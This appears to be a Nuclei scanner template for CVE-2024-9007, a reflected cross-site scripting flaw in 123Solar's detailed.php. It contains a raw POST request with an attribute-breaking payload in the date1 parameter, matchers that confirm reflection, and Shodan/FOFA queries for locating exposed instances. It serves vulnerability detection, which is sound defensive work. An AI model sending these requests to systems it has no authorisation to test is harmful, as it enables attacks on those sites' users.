id: CVE-2024-9007 info: name: 123Solar 1.8.4.5 - Cross-Site Scripting author: ritikchaddha severity: medium description: | 123Solar 1.8.4.5 is vulnerable to reflected cross-site scripting (XSS) via the date1 parameter in detailed.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. impact: | Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities. remediation: | Update 123Solar to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the date1 parameter in detailed.php. reference: - https://github.com/Hebing123/cve/issues/73 - https://nvd.nist.gov/vuln/detail/CVE-2024-9007 classification: epss-score: 0.00931 epss-percentile: 0.56056 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-9007 cwe-id: CWE-79 cpe: cpe:2.3:a:123solar:123solar:1.8.4.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: 123solar product: 123solar fofa-query: title="123Solar" shodan-query: title:"123Solar" tags: cve,cve2024,xss,123solar,vuln http: - raw: - | POST /123solar/{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded date1=01/01/1967'>&checkavgpower=on&checkPROD=on&checkPERF=on&checkIP1=on&checkIV1=on&checkIA1=on&checkPERF1=on&checkIP2=on&checkIV2=on&checkIA2=on&checkPERF2=on&checkG1P=on&checkG1V=on&checkG1A=on&checkFRQ=on&checkINVT=on&checkBOOT=on&checkEFF=on payloads: path: - 'detailed.php' - 'indexdetailed.php' matchers-condition: and matchers: - type: word part: body words: - "" - "datepickid" condition: and - type: word part: content_type words: - 'text/html' - type: status status: - 200 # digest: 4a0a00473045022100b22e099ef342f296922cde474474e1d5248e57f273de0a7410ece53fe2df8b07022039872eab5f347817910bde262c1b204d61bfd1b121d2653165938086bc05f868:922c64590222798bb761d5b6d8e72950